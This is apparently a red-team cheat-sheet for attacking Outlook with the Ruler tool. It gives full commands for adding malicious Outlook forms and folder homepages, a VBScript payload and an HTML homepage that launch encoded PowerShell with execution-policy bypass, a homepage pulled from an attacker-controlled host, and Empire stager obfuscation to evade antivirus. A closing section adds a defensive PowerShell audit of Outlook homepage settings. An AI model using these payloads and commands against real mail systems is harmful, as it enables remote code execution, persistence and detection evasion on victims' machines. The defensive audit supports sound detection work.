Outlook

## Forms

Display forms:

```
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form display
```

Exploit:

```
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form add --suffix test-form --input vbs-payload.txt --send
```

vbs-payload.txt:

```vb
CreateObject("WScript.Shell").Run "powershell -exec bypass -enc <BASE64_CMD>", 0, false
```

Cleanup:

```
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug form delete --suffix test-form
```

Empire stager encryption:

```
$ grep -e output_type -e payload_type -e clean_output -e userdomain genetic.config
output_type = GO
payload_type = DLL_x64
clean_output = True
userdomain = 'MEGACORP'
$ python ebowla.py https443.dll genetic.config
$ ./build_x64_go.sh output/go_symmetric_https443.dll.go https443.exe --hidden
```

## Homepage

Exploit:

```
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage add --url http://10.10.13.37/homepage.html
```

homepage.html:

```html
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
Sub window_onload()
Set Application = ViewCtl1.OutlookApplication
Set cmd = Application.CreateObject("Wscript.Shell")
cmd.Run("powershell -exec bypass -e <BASE64_CMD>")
End Sub
-->
</script>
</head>
<body>
<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
```

Cleanup:

```
$ ./ruler -k --nocache --url https://autodiscover.megacorp.com/autodiscover/autodiscover.xml -d megacorp.com -u 'snovvcrash' -p 'Passw0rd!' -e [email protected] --verbose --debug homepage delete
```

Stager encryption is the same as for Ruler/Forms.
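The blue-team counterpart to the homepage technique above, added here as an example and not part of the original page or of Ruler itself: a PowerShell audit of the current user's Outlook folder homepage configuration. It assumes that Outlook keeps per-folder homepage URLs under `HKCU:\Software\Microsoft\Office\<version>\Outlook\WebView\<Folder>\URL` and that the post-patch opt-in for server-side (roaming) homepages is the `EnableRoamingFolderHomepages` DWORD under the `Security` subkey; both paths and the version list are assumptions to verify against the Outlook build in use.

```powershell
# Added example (not from the original page or from Ruler): enumerate Outlook
# folder homepage settings for the current user and flag anything that would
# let an attacker-controlled page render inside Outlook.
# Assumed registry layout:
#   HKCU:\Software\Microsoft\Office\<ver>\Outlook\WebView\<Folder>\URL
#   HKCU:\Software\Microsoft\Office\<ver>\Outlook\Security\EnableRoamingFolderHomepages
function Get-OutlookHomepageFindings {
    $findings = @()
    foreach ($ver in '14.0', '15.0', '16.0') {          # assumed Office versions to check
        $base = "HKCU:\Software\Microsoft\Office\$ver\Outlook"

        # 1. Any folder with a non-empty homepage URL is worth a look: a
        #    default install leaves these blank.
        $webview = Join-Path $base 'WebView'
        if (Test-Path $webview) {
            Get-ChildItem -Path $webview | ForEach-Object {
                $url = (Get-ItemProperty -Path $_.PSPath -Name 'URL' -ErrorAction SilentlyContinue).URL
                if ($url) {
                    $findings += [pscustomobject]@{
                        Version = $ver
                        Folder  = $_.PSChildName
                        Setting = 'URL'
                        Value   = $url
                        Note    = 'Folder homepage configured; confirm it is sanctioned'
                    }
                }
            }
        }

        # 2. The mitigation for roaming homepages (the kind Ruler sets on the
        #    mailbox folder) is off unless this value has been explicitly set
        #    to 1; a 1 here re-enables the attack surface.
        $sec  = Join-Path $base 'Security'
        $roam = (Get-ItemProperty -Path $sec -Name 'EnableRoamingFolderHomepages' -ErrorAction SilentlyContinue).EnableRoamingFolderHomepages
        if ($roam -eq 1) {
            $findings += [pscustomobject]@{
                Version = $ver
                Folder  = '-'
                Setting = 'EnableRoamingFolderHomepages'
                Value   = $roam
                Note    = 'Roaming folder homepages re-enabled; Ruler-style homepage persistence works'
            }
        }
    }
    return $findings
}

# Usage: run in the user's context; an empty table is the expected clean state.
Get-OutlookHomepageFindings | Format-Table -AutoSize
```

Because Ruler writes the homepage to the mailbox folder on the server rather than to the client registry, this check answers a different question from `ruler homepage display`: whether the endpoint is configured to honour such a homepage at all, and whether any local folder homepage has been set directly. The two checks complement each other; neither alone covers both placement paths.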